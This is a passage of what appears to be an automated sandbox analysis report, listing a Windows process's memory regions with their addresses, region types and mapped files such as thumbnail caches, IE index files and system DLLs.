yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000017.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000017.db") Region: id = 1139 start_va = 0x2030000 end_va = 0x2033fff entry_point = 0x2030000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1140 start_va = 0x2040000 end_va = 0x2041fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 1141 start_va = 0x2050000 end_va = 0x205ffff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1142 start_va = 0x2060000 end_va = 0x20dffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1143 start_va = 0x20e0000 end_va = 0x210ffff entry_point = 0x20e0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1144 start_va = 0x2110000 end_va = 0x2111fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002110000" filename = "" Region: id = 1145 start_va = 0x2120000 end_va = 0x215ffff entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 1146 start_va = 0x2160000 end_va = 0x2160fff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 1147 start_va = 0x2170000 end_va = 0x2173fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 1148 start_va = 0x2180000 end_va = 0x2183fff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1149 start_va = 0x2190000 end_va = 0x2191fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002190000" filename = "" Region: id = 1150 start_va = 0x21a0000 end_va = 0x21a0fff entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 1151 start_va = 0x21b0000 end_va = 0x21b0fff entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 1152 start_va = 0x21c0000 end_va = 0x21c3fff entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1153 start_va = 0x21d0000 end_va = 0x21d0fff entry_point = 0x0 region_type = private name = "private_0x00000000021d0000" filename = "" Region: id = 1154 start_va = 0x21e0000 end_va = 0x21e0fff entry_point = 0x0 region_type = private name = "private_0x00000000021e0000" filename = "" Region: id = 1155 start_va = 0x21f0000 end_va = 0x21f0fff entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1156 start_va = 0x2200000 end_va = 0x2200fff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 1157 start_va = 0x2210000 end_va = 0x2210fff entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 1158 start_va = 0x2220000 end_va = 0x222ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 1159 start_va = 0x2240000 end_va = 0x2241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002240000" filename = "" Region: id = 1160 start_va = 0x2250000 end_va = 0x225cfff entry_point = 0x2250000 region_type = mapped_file name = "wininet.dll.mui" filename = "\\Windows\\System32\\en-US\\wininet.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wininet.dll.mui") Region: id = 1161 start_va = 0x2260000 end_va = 0x2267fff entry_point = 0x2260000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\temporary internet files\\content.ie5\\index.dat") Region: id = 1162 start_va = 0x2270000 end_va = 0x2273fff entry_point = 0x2270000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\Cookies\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\cookies\\index.dat") Region: id = 1163 start_va = 0x2280000 end_va = 0x228ffff entry_point = 0x2280000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\index.dat") Region: id = 1164 start_va = 0x2290000 end_va = 0x229ffff entry_point = 0x2290000 region_type = mapped_file name = "index.dat" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\History\\History.IE5\\MSHist012017122020171221\\index.dat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\history\\history.ie5\\mshist012017122020171221\\index.dat") Region: id = 1165 start_va = 0x22a0000 end_va = 0x22a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022a0000" filename = "" Region: id = 1166 start_va = 0x2330000 end_va = 0x242ffff entry_point = 0x2330000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1167 start_va = 0x2430000 end_va = 0x2430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002430000" filename = "" Region: id = 1168 start_va = 0x2440000 end_va = 0x2441fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002440000" filename = "" Region: id = 1169 start_va = 0x2450000 end_va = 0x2453fff entry_point = 0x2450000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1170 start_va = 0x2460000 end_va = 0x2461fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 1171 start_va = 0x2470000 end_va = 0x2470fff entry_point = 0x2470000 region_type = mapped_file name = "{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{1FA14682-CABC-4310-BDEA-6ED0DE65ED67}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{1fa14682-cabc-4310-bdea-6ed0de65ed67}.2.ver0x0000000000000001.db") Region: id = 1172 start_va = 0x2480000 end_va = 0x2483fff entry_point = 0x2480000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1173 start_va = 0x2490000 end_va = 0x2490fff entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 1174 start_va = 0x24a0000 end_va = 0x24a0fff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 1175 start_va = 0x24b0000 end_va = 0x24b0fff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 1176 start_va = 0x24c0000 end_va = 0x24c0fff entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 1177 start_va = 0x24d0000 end_va = 0x250ffff entry_point = 0x0 region_type = private name = "private_0x00000000024d0000" filename = "" Region: id = 1178 start_va = 0x2510000 end_va = 0x2510fff entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 1179 start_va = 0x2520000 end_va = 0x2520fff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 1180 start_va = 0x2530000 end_va = 0x2530fff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 1181 start_va = 0x2540000 end_va = 0x257ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 1182 start_va = 0x2580000 end_va = 0x25e5fff entry_point = 0x2580000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1183 start_va = 0x25f0000 end_va = 0x262ffff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 1184 start_va = 0x2630000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 1185 start_va = 0x2730000 end_va = 0x2730fff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 1186 start_va = 0x2740000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 1187 start_va = 0x2780000 end_va = 0x30affff entry_point = 0x2780000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 1188 start_va = 0x30b0000 end_va = 0x30b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030b0000" filename = "" Region: id = 1189 start_va = 0x30c0000 end_va = 0x30c3fff entry_point = 0x30c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1190 start_va = 0x30d0000 end_va = 0x30d0fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 1191 start_va = 0x30e0000 end_va = 0x30e0fff entry_point = 0x30e0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1192 start_va = 0x30f0000 end_va = 0x30f0fff entry_point = 0x30f0000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1193 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x3100000 region_type = mapped_file name = "{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{4CA276EC-52B8-4975-9DCF-73426EA8BE98}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{4ca276ec-52b8-4975-9dcf-73426ea8be98}.2.ver0x0000000000000002.db") Region: id = 1194 start_va = 0x3110000 end_va = 0x3113fff entry_point = 0x3110000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1195 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x3120000 region_type = mapped_file name = "{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{AAA8DCD7-A38D-4E8A-B14C-574F94213A00}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{aaa8dcd7-a38d-4e8a-b14c-574f94213a00}.2.ver0x0000000000000001.db") Region: id = 1196 start_va = 0x3130000 end_va = 0x3130fff entry_point = 0x3130000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1197 start_va = 0x3140000 end_va = 0x317ffff entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1198 start_va = 0x3180000 end_va = 0x31bffff entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 1199 start_va = 0x31c0000 end_va = 0x31c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031c0000" filename = "" Region: id = 1200 start_va = 0x31d0000 end_va = 0x31d0fff entry_point = 0x31d0000 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 1201 start_va = 0x31e0000 end_va = 0x31e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000031e0000" filename = "" Region: id = 1202 start_va = 0x31f0000 end_va = 0x322ffff entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 1203 start_va = 0x3230000 end_va = 0x3230fff entry_point = 0x3230000 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 1204 start_va = 0x3240000 end_va = 0x3241fff entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 1205 start_va = 0x3250000 end_va = 0x3251fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003250000" filename = "" Region: id = 1206 start_va = 0x3260000 end_va = 0x3261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003260000" filename = "" Region: id = 1207 start_va = 0x3270000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 1208 start_va = 0x32b0000 end_va = 0x32e2fff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 1209 start_va = 0x32f0000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 1210 start_va = 0x3330000 end_va = 0x3331fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003330000" filename = "" Region: id = 1211 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 1212 start_va = 0x3350000 end_va = 0x3350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003350000" filename = "" Region: id = 1213 start_va = 0x3360000 end_va = 0x3360fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003360000" filename = "" Region: id = 1214 start_va = 0x3370000 end_va = 0x33affff entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 1215 start_va = 0x33b0000 end_va = 0x33fffff entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 1216 start_va = 0x3400000 end_va = 0x3447fff entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1217 start_va = 0x3450000 end_va = 0x3452fff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 1218 start_va = 0x3460000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1219 start_va = 0x34a0000 end_va = 0x34dffff entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 1220 start_va = 0x34e0000 end_va = 0x34e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000034e0000" filename = "" Region: id = 1221 start_va = 0x34f0000 end_va = 0x352ffff entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 1222 start_va = 0x3530000 end_va = 0x3531fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003530000" filename = "" Region: id = 1223 start_va = 0x3540000 end_va = 0x357ffff entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 1224 start_va = 0x3580000 end_va = 0x3581fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003580000" filename = "" Region: id = 1225 start_va = 0x3590000 end_va = 0x3590fff entry_point = 0x3590000 region_type = mapped_file name = "oleaccrc.dll" filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll") Region: id = 1226 start_va = 0x35a0000 end_va = 0x35a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 1227 start_va = 0x35b0000 end_va = 0x35b6fff entry_point = 0x35b0000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1228 start_va = 0x35c0000 end_va = 0x35fffff entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 1229 start_va = 0x3600000 end_va = 0x3601fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003600000" filename = "" Region: id = 1230 start_va = 0x3610000 end_va = 0x3611fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003610000" filename = "" Region: id = 1231 start_va = 0x3620000 end_va = 0x3623fff entry_point = 0x3620000 region_type = mapped_file name = "prnfldr.dll.mui" filename = "\\Windows\\System32\\en-US\\prnfldr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\prnfldr.dll.mui") Region: id = 1232 start_va = 0x3630000 end_va = 0x366ffff entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 1233 start_va = 0x3670000 end_va = 0x3680fff entry_point = 0x3670000 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 1234 start_va = 0x3690000 end_va = 0x36cffff entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 1235 start_va = 0x36d0000 end_va = 0x370ffff entry_point = 0x0 region_type = private name = "private_0x00000000036d0000" filename = "" Region: id = 1236 start_va = 0x3710000 end_va = 0x380ffff entry_point = 0x3710000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1237 start_va = 0x3810000 end_va = 0x390ffff entry_point = 0x3810000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1238 start_va = 0x3910000 end_va = 0x3a0ffff entry_point = 0x3910000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1239 start_va = 0x3a10000 end_va = 0x3c0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 1240 start_va = 0x3c10000 end_va = 0x3c10fff entry_point = 0x3c10000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1241 start_va = 0x3c20000 end_va = 0x3c20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c20000" filename = "" Region: id = 1242 start_va = 0x3c30000 end_va = 0x3c30fff entry_point = 0x3c30000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1243 start_va = 0x3c40000 end_va = 0x3c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000003c40000" filename = "" Region: id = 1244 start_va = 0x3c80000 end_va = 0x3c80fff entry_point = 0x3c80000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1245 start_va = 0x3c90000 end_va = 0x3c90fff entry_point = 0x0 region_type = private name = "private_0x0000000003c90000" filename = "" Region: id = 1246 start_va = 0x3ca0000 end_va = 0x3ca0fff entry_point = 0x3ca0000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1247 start_va = 0x3cb0000 end_va = 0x5004fff entry_point = 0x3cb0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1248 start_va = 0x5010000 end_va = 0x5411fff entry_point = 0x0 region_type = private name = "private_0x0000000005010000" filename = "" Region: id = 1249 start_va = 0x5420000 end_va = 0x5420fff entry_point = 0x5420000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1250 start_va = 0x5430000 end_va = 0x5430fff entry_point = 0x5430000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1251 start_va = 0x54a0000 end_va = 0x54dffff entry_point = 0x0 region_type = private name = "private_0x00000000054a0000" filename = "" Region: id = 1252 start_va = 0x5560000 end_va = 0x559ffff entry_point = 0x0 region_type = private name = "private_0x0000000005560000" filename = "" Region: id = 1253 start_va = 0x5600000 end_va = 0x560ffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 1254 start_va = 0x5630000 end_va = 0x566ffff entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 1255 start_va = 0x5670000 end_va = 0x567ffff entry_point = 0x0 region_type = private name = "private_0x0000000005670000" filename = "" Region: id = 1256 start_va = 0x5690000 end_va = 0x56cffff entry_point = 0x0 region_type = private name = "private_0x0000000005690000" filename = "" Region: id = 1257 start_va = 0x5700000 end_va = 0x573ffff entry_point = 0x0 region_type = private name = "private_0x0000000005700000" filename = "" Region: id = 1258 start_va = 0x5770000 end_va = 0x57affff entry_point = 0x0 region_type = private name = "private_0x0000000005770000" filename = "" Region: id = 1259 start_va = 0x57b0000 end_va = 0x57bffff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 1260 start_va = 0x5800000 end_va = 0x583ffff entry_point = 0x0 region_type = private name = "private_0x0000000005800000" filename = "" Region: id = 1261 start_va = 0x5840000 end_va = 0x58fffff entry_point = 0x5840000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1262 start_va = 0x5940000 end_va = 0x597ffff entry_point = 0x0 region_type = private name = "private_0x0000000005940000" filename = "" Region: id = 1263 start_va = 0x59c0000 end_va = 0x59fffff entry_point = 0x0 region_type = private name = "private_0x00000000059c0000" filename = "" Region: id = 1264 start_va = 0x5a00000 end_va = 0x5a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a00000" filename = "" Region: id = 1265 start_va = 0x5a50000 end_va = 0x5a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005a50000" filename = "" Region: id = 1266 start_va = 0x5af0000 end_va = 0x5b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005af0000" filename = "" Region: id = 1267 start_va = 0x5b40000 end_va = 0x5b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000005b40000" filename = "" Region: id = 1268 start_va = 0x5bb0000 end_va = 0x5beffff entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 1269 start_va = 0x5c00000 end_va = 0x5c3ffff entry_point = 0x0 region_type = private name = "private_0x0000000005c00000" filename = "" Region: id = 1270 start_va = 0x5c40000 end_va = 0x5d3ffff entry_point = 0x5c40000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1271 start_va = 0x5d40000 end_va = 0x5e3ffff entry_point = 0x5d40000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1272 start_va = 0x5e40000 end_va = 0x5f3ffff entry_point = 0x5e40000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1273 start_va = 0x5f40000 end_va = 0x623ffff entry_point = 0x0 region_type = private name = "private_0x0000000005f40000" filename = "" Region: id = 1274 start_va = 0x6240000 end_va = 0x639ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006240000" filename = "" Region: id = 1275 start_va = 0x6640000 end_va = 0x673ffff entry_point = 0x6640000 region_type = mapped_file name = "thumbcache_96.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1276 start_va = 0x6740000 end_va = 0x683ffff entry_point = 0x6740000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1277 start_va = 0x6d270000 end_va = 0x6dceffff entry_point = 0x6d270000 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 1278 start_va = 0x6dcf0000 end_va = 0x6dd0afff entry_point = 0x6dcf0000 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 1279 start_va = 0x6dfd0000 end_va = 0x6dfd6fff entry_point = 0x6dfd0000 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 1280 start_va = 0x6dfe0000 end_va = 0x6dff3fff entry_point = 0x6dfe0000 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 1281 start_va = 0x6e000000 end_va = 0x6e007fff entry_point = 0x6e000000 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 1282 start_va = 0x6e040000 end_va = 0x6e075fff entry_point = 0x6e040000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1283 start_va = 0x6e080000 end_va = 0x6e28dfff entry_point = 0x6e080000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1284 start_va = 0x6e2d0000 end_va = 0x6e2d7fff entry_point = 